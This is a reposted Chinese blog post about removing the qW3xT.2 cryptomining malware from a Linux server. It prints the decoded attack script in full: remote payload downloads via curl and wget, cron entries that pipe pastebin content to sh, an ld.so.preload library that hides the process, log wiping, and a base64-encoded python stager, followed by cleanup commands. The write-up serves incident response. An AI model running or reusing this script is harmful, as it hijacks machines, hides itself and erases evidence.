挖矿病毒 qW3xT.2 最终解决方案

2023年6月1日上午2:27 • 技术杂谈 • 阅读 79

转自：https://blog.csdn.net/hgx13467479678/article/details/82347473

1，cpu 100%, 用top 查看cpu100

2,删掉此进程 cpu还是 100%

3，估计是进程被隐藏了

4，定时任务多了一个执行任务

5：打开连接 https://pastebin.com/raw/xbY7p5Tb 获取如下内容

6：打开 https://pastebin.com/raw/uuYVPLXd ，发现是一个Base64编码字符串，

7：用Base64解码此内容得到如下脚本内容

!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {

pkill -f sourplum

pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg

rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius

rm -rf /tmp/index_bak

rm -rf /tmp/httpd.conf

rm -rf /tmp/*httpd.conf

rm -rf /tmp/a7b104c270

ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmrig” | awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmrigDaemon” | awk ‘{print $2}’|xargs kill -9

ps auxf|grep -v grep|grep “xmrigMiner” | awk ‘{print $2}’|xargs kill -9

pkill -f biosetjenkins

pkill -f AnXqV.yam

pkill -f xmrigDaemon

pkill -f xmrigMiner

pkill -f xmrig

pkill -f Loopback

pkill -f apaceha

pkill -f cryptonight

pkill -f stratum

pkill -f mixnerdx

pkill -f performedl

pkill -f JnKihGjn

pkill -f irqba2anc1

pkill -f irqba5xnc1

pkill -f irqbnc1

pkill -f ir29xc1

pkill -f conns

pkill -f irqbalance

pkill -f crypto-pool

pkill -f minexmr

pkill -f XJnRj

pkill -f NXLAi

pkill -f BI5zj

pkill -f askdljlqw

pkill -f minerd

pkill -f minergate

pkill -f Guard.sh

pkill -f ysaydh

pkill -f bonns

pkill -f donns

pkill -f kxjd

pkill -f Duck.sh

pkill -f bonn.sh

pkill -f conn.sh

pkill -f kworker34

pkill -f kw.sh

pkill -f pro.sh

pkill -f polkitd

pkill -f acpid

pkill -f icb5o

pkill -f nopxi

pkill -f irqbalanc1

pkill -f minerd

pkill -f i586

pkill -f gddr

pkill -f mstxmr

pkill -f ddg.2011

pkill -f wnTKYg

pkill -f deamon

pkill -f disk_genius

pkill -f sourplum

pkill -f bashx

pkill -f bashg

pkill -f bashe

pkill -f bashf

pkill -f bashh

pkill -f XbashY

pkill -f libapache

rm -rf /tmp/httpd.conf

rm -rf /tmp/conn

rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache

rm -rf /tmp/conns

rm -f /tmp/irq.sh

rm -f /tmp/irqbalanc1

rm -f /tmp/irq

rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

netstat -anp | grep 69.28.55.86:443 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 3333 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 4444 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 5555 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 6666 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 7777 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 3347 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 14444 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

netstat -anp | grep 5.196.225.222 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

y=$(ps aux | grep -v grep | grep kworkerds | wc -l )

if [ ${y} -eq 0 ];then

netstat -anp | grep 13531 |awk ‘{print $7}’| awk -F'[/]’ ‘{print $1}’ | xargs kill -9

function system() {

if [ ! -f “/bin/httpdns” ]; then

curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns

if [ ! -f “/bin/httpdns” ]; then

sed -i ‘$d’ /etc/crontab && echo -e “ /6 * * * root /bin/sh /bin/httpdns” >> /etc/crontab

function top() {

if [ ! -f “/usr/local/lib/libntp.so” ]; then

curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

if [ ! -f “/usr/local/lib/libntp.so” ]; then

wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so

if [ ! -f “/etc/ld.so.preload” ]; then

echo /usr/local/lib/libntp.so > /etc/ld.so.preload

else

sed -i ‘$d’ /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload

touch -acmr /bin/sh /etc/ld.so.preload

touch -acmr /bin/sh /usr/local/lib/libjdk.so

touch -acmr /bin/sh /usr/local/lib/libntp.so

echo 0>/var/spool/mail/root

echo 0>/var/log/wtmp

echo 0>/var/log/secure

echo 0>/var/log/cron

function python() {

nohup python -c “import base64;exec(base64.b64decode(‘I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz’))” >/dev/null 2>&1 &

touch /tmp/.tmpa

function echocron() {

echo -e “/10 * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##” > /etc/cron.d/root

echo -e “/30 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##” > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo -e “ /10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##” > /var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root

touch -acmr /bin/sh /var/spool/cron/crontabs

touch -acmr /bin/sh /var/spool/cron/root

touch -acmr /bin/sh /var/spool/cron/crontabs/root

function downloadrun() {

ps=$(netstat -anp | grep 13531 | wc -l)

if [ ${ps} -eq 0 ];then

if [ ! -f “/tmp/kworkerds” ]; then

curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds

if [ ! -f “/tmp/kworkerds” ]; then

wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds

nohup /tmp/kworkerds >/dev/null 2>&1 &

else

nohup /tmp/kworkerds >/dev/null 2>&1 &

function downloadrunxm() {

pm=$(netstat -anp | grep 13531 | wc -l)

if [ ${pm} -eq 0 ];then

if [ ! -f “/bin/config.json” ]; then

curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json

if [ ! -f “/bin/config.json” ]; then

wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json

if [ ! -f “/bin/kworkerds” ]; then

curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds

if [ ! -f “/bin/kworkerds” ]; then

wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds

nohup /bin/kworkerds >/dev/null 2>&1 &

else

nohup /bin/kworkerds >/dev/null 2>&1 &

update=$( curl -fsSL –connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )

if [ ${update}x = “update”x ];then

echocron

else

if [ ! -f “/tmp/.tmpa” ]; then

rm -rf /tmp/.tmp

python

kills

downloadrun

echocron

system

top

sleep 10

port=$(netstat -anp | grep 13531 | wc -l)

if [ ${port} -eq 0 ];then

downloadrunxm

8：根据此脚本最终解决方案

A:先把定时任务删除掉

rm -rf /etc/cron.d/root

rm -rf /var/spool/cron/crontabs

rm -rf /bin/sh /var/spool/cron/root

B:删掉重启系统后执行脚本

rm -rf /bin/httpdns

C：删掉挖矿执行脚本

rm -rf /tmp/kworkerds

D: 删除修top显示命令的脚本（导致top查询不处理此挖矿进程）

rm -rf /usr/local/lib/libntp.so

E:删除python执行文件

rm -rf /tmp/.tmpa

F: 再用Top命令，就可以找出此耗cpu进程

7：kill 掉此进程

9：修改redis 密码，最好修改bind 为127.0.0.1

Original: https://www.cnblogs.com/x_wukong/p/9861266.html
Author: 明明是悟空
Title: 挖矿病毒 qW3xT.2 最终解决方案

原创文章受到原创版权保护。转载请注明出处：https://www.johngo689.com/553994/

转载文章受原作者版权保护。转载请注明原作者出处！

技术杂谈

【自取】最近整理的，有需要可以领取学习：

Linux核心资料大放送~

全栈面试题汇总（持续更新&可下载）

一个提高学习100%效率的工具！

【超详细】深度学习面试题目！

LeetCode Python刷题答案下载！

LeetCode Java版刷题答案下载！

LeetCode C++ 版本，抓紧保存！

LeetCode GO语言刷题答案下载！

003Linux查看文件内容的5个命令姿势

Linux 中查看文件内容常用的有如下 5 个命令： cat cat 命令常用格式示例： cat [文件名] # 输出文件所有内容到屏幕上。 cat [文件1] [文件2] # 输…

技术杂谈 2023年7月10日
0080
eclipse反编译插件

1、在eclipse的help—》Install New Software…中添加新软件开发，添加它的源： undefined name ： jd – ec…

技术杂谈 2023年7月24日
0074
jquery 跨域调用wcf 返回json 碰到的一些问题

走到这里的时候，发现网络上能学习的资源或是比较适合自己项目的文章越来越少了，也在这里停留了比较长的时间在做跨域的过程中，感觉http://localhost:9090/域与htt…

技术杂谈 2023年7月11日
0093
go逃逸分析

我们在写代码的时候，有时候会想这个变量到底分配到哪里了？这时候可能会有人说，在栈上，在堆上。信我准没错… 但从结果上来讲你还是一知半解，这可不行，万一被人懵了呢。今天我…

技术杂谈 2023年5月30日
0093
reason”: “Root mapping definition has unsupported parameters:

1、在Kibana创建索引的时候报错，使用的elasticsearch版本是7.2.1版本。 1 PUT /person 2 { 3 "settings": {…

技术杂谈 2023年5月31日
0069
h3c v5系列和v7系列端口上的qos限速命令

v5系列 inbound：对端口接收报文进行速率限制outbound：对端口发送报文进行速率限制target-rate：对端口发送或接收报文限制的总速率，端口级别取值范围为 1～2…

技术杂谈 2023年5月31日
0098
Dijkstra算法详解（完美图解、趣学算法）

摘自：https://blog.csdn.net/qq_45776662/article/details/107177424 Dijkstra算法设计 * Dijkstra算法简介…

技术杂谈 2023年5月31日
00105
统一网关Gateway的使用：

为什么需要网关？ Gateway网关是我们服务的守门神，所有微服务的统一入口网关的核心功能特性：网关的功能：身份认证和权限校验服务路由，负载均衡请求限流在SpringCl…

技术杂谈 2023年6月21日
0090
linux根目录无法查看文件执行ls卡死无反应执行df -h 也同样没反应的处理方法

问题现象： 1、执行 df -h 卡死没反应，执行 df -hl 可以正常显示； 2、执行  ll / 或 ls /&…

技术杂谈 2023年7月24日
0054
小兔的棋盘（hdu2067）

Time Limit: 1000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others)Total Subm…

技术杂谈 2023年5月31日
0079
CSS 埋点统计

原文地址： https://my.oschina.net/u/1778933/blog/1608904 CSS 埋点统计当一个网站或者 App 的规模达到一定程度，需要分析用户在…

技术杂谈 2023年5月31日
0088
MySQL的三值逻辑

MySQL 采用三值逻辑 SELECT 1 = 1; SELECT 1 = 2; SELECT 1 = NULL; SELECT 1 != NULL; 上面四条语句的结果分别为：可…

技术杂谈 2023年7月25日
0056
MySQL8.0新特性—窗口函数

窗口函数（window functions）是一种对结果集进行计算，并将计算结果合并到结果集上返回多行的一类函数。MySQL8开始支持窗口函数，包括RANK()、LAG()和NTI…

技术杂谈 2023年7月24日
0056
ulimit -n 修改最大链接数

使用ulimit -a 可以查看当前系统的所有限制值，使用ulimit -n 可以查看当前的最大打开文件数。新装的linux默认只有1024，当作负载较大的服务器时，很容易遇到e…

技术杂谈 2023年5月31日
0084
从“蚁族”现象看高等教育公平

一、蚁族的出现背景 2003年初，首批扩招大学生进入社会，与下岗再就业职工和民工潮汇聚成为就业洪峰，就业压力空前增大。 2014年，教育部公告显示，全国普通高校毕业生规模达到727…

技术杂谈 2023年5月31日
0094
为何要花费精力琢磨人工意识?

人工意识的人工智能的区别大概我不用解释什么是人工意识，但是这个概念其实跟AI有一些细微差别，叫强人工智能也可以，但是最近我认识到 “智能” 跟&#8221…

技术杂谈 2023年6月21日
0086

2024 年 5 月
一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

挖矿病毒 qW3xT.2 最终解决方案

!/bin/bash

大家都在看